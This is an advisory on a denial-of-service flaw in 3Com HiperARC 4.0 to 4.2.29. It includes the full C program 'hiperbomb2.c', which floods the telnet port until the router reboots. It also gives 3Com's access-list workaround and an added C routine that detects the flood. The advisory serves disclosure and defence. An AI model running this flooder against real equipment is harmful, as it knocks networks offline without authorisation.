Vulnerability

    3COM HiperARC

Affected

    3COM HiperARC 4.0...4.2.29

Description

    Jonathan Chapman found the following.  The program below will reboot
    a 3com HiperARC.  By flooding the telnet port of a 3com HiperARC using
    the provided program, the HiperARC unconditionally reboots.  This
    program is effective over all interfaces, including a dialup.

    /* ---------------------------------------------------------------------
     * hiperbomb2.c - Reboots HiperARC faster.
     * ---------------------------------------------------------------------
     * (c) 1999 - Jonathan Chapman <jchapman@1st.net>
     * ---------------------------------------------------------------------
     * Sends a high volume of IACs which eventually leads to a reboot of the
     * HiperARC.  Brief testing indicated that this problem is most likely
     * specific to sending IACs rather than any other type of data.  Further
     * research has shown that specific IAC patterns are more likely to cause
     * a reboot.  In this example I use one of the most efficient combinations
     * I have discovered.  Through my testing it usually required at least
     * 60,000 packets to cause the HiperARC to reboot.
     * ---------------------------------------------------------------------
     */

    #include <stdio.h>
    #include <stdarg.h>
    #include <fcntl.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    char *chassis;
    int sockfd, num_of_tries;

    void connect_to_chassis(char *name)
    {
      struct hostent *host;
      struct sockaddr_in remote;

      host = gethostbyname(name);
      if(!host)
      {
        fprintf(stderr, "Cannot resolve host %s.\n", name);
        exit(3);
      }

      sockfd = socket(AF_INET, SOCK_STREAM, 0);
      if(sockfd < 0)
      {
        fprintf(stderr, "Cannot obtain descriptor.\n");
        exit(4);
      }

      remote.sin_family = AF_INET;
      remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
      remote.sin_port = htons(23);

      connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));
      return;
    }

    void send_iacs()
    {
      unsigned char reply[3] = {254, 36, 185};
      unsigned int k;

      for(k = 0; k < num_of_tries; k++)
      {
        write(sockfd, reply, 3);
      }
    }

    int main(int ac, char **av)
    {
      if(ac < 3)
      {
        fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
        fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
        exit(2);
      }

      chassis = av[1];
      num_of_tries = atoi(av[2]);

      fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n", chassis, num_of_tries);
      connect_to_chassis(chassis);
      send_iacs();
      fprintf(stderr, "Attack complete.\n");
      exit(0);
    }

    This has been confirmed on 3Com Corporation HiPer Access Router Card
    Built on Feb 16 1999 at 12:42:34.  System Version: V4.1.59.

Solution

    3Com acknowledges and has verified the existence of the hiperbomb DOS
    attack.  All HiPer ARC software (4.0 - 4.2.29) is vulnerable to the
    attack.  The following workaround will protect your equipment until
    the software patch becomes available.  Defect is logged under 3Com
    MR#11022.

    It is possible to add a telnet access list of trusted hosts on the
    HiPer ARC.  It can be assumed that the attack will not come from a
    trusted host.  It is also recommended that you do not allow any telnet
    sessions from outside your network.
    To add a telnet access list:

    1) Add telnet clients.  These clients may be individual hosts or
       networks.

           "ADD TELNET CLIENT X.X.X.X"

       "LIST TELNET CLIENTS" will list all configured clients.

    2) Enable the telnet client access list feature.

           "ENABLE TELNET CLIENT_ACCESS"
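
For hosts that must stay on the access list, a sensor in front of the chassis can also watch for the traffic shape described above. The following is an added detection example, not part of the advisory or of 3Com's fix: it scans a reassembled client-to-server telnet stream for a long run of one repeating 3-byte unit that starts with a negotiation verb, which covers the 254, 36, 185 unit in the program above and generalizes to other such triplets. The function names, the sample data and the FLOOD_UNITS threshold are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed threshold, far below the ~60,000 writes the advisory reports. */
#define FLOOD_UNITS 1000

/* Telnet negotiation verbs WILL, WONT, DO, DONT (RFC 854). */
static int is_verb(unsigned char b) { return b >= 251 && b <= 254; }

/* Longest run, in 3-byte units, of one repeating <verb, x, y> triplet.
 * Every offset is tried, so TCP segmentation does not change the result. */
size_t longest_triplet_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, i = 0;
    while (i + 3 <= len) {
        size_t units = 1, j = i + 3;
        if (!is_verb(buf[i])) { i++; continue; }
        while (j + 3 <= len && memcmp(buf + j, buf + i, 3) == 0) { units++; j += 3; }
        if (units > best) best = units;
        i = (units > 1) ? j : i + 1;   /* skip past a run already counted */
    }
    return best;
}

int looks_like_flood(const unsigned char *buf, size_t len)
{
    return longest_triplet_run(buf, len) >= FLOOD_UNITS;
}

/* Constructed sample: a stray byte, then `units` copies of the page's triplet. */
size_t sample_flood(unsigned char *out, size_t cap, size_t units)
{
    static const unsigned char unit[3] = {254, 36, 185};
    size_t n = 0;
    if (cap > 0) out[n++] = 'x';
    while (units-- > 0 && n + 3 <= cap) { memcpy(out + n, unit, 3); n += 3; }
    return n;
}

/* Constructed sample: ordinary option negotiation, then typed text. */
const unsigned char SAMPLE_NORMAL[13] =
    {255, 251, 24, 255, 251, 31, 255, 253, 1, 'l', 's', '\r', '\n'};

int main(void)
{
    static unsigned char flood[1 + 3 * 2000];
    size_t n = sample_flood(flood, sizeof flood, 2000);
    printf("normal=%d flood=%d\n",
           looks_like_flood(SAMPLE_NORMAL, 13), looks_like_flood(flood, n));
    return 0;
}
```

An ordinary session carries only a handful of negotiation bytes at start-up, so the longest run there stays at 1 while the constructed flood sample reaches the threshold.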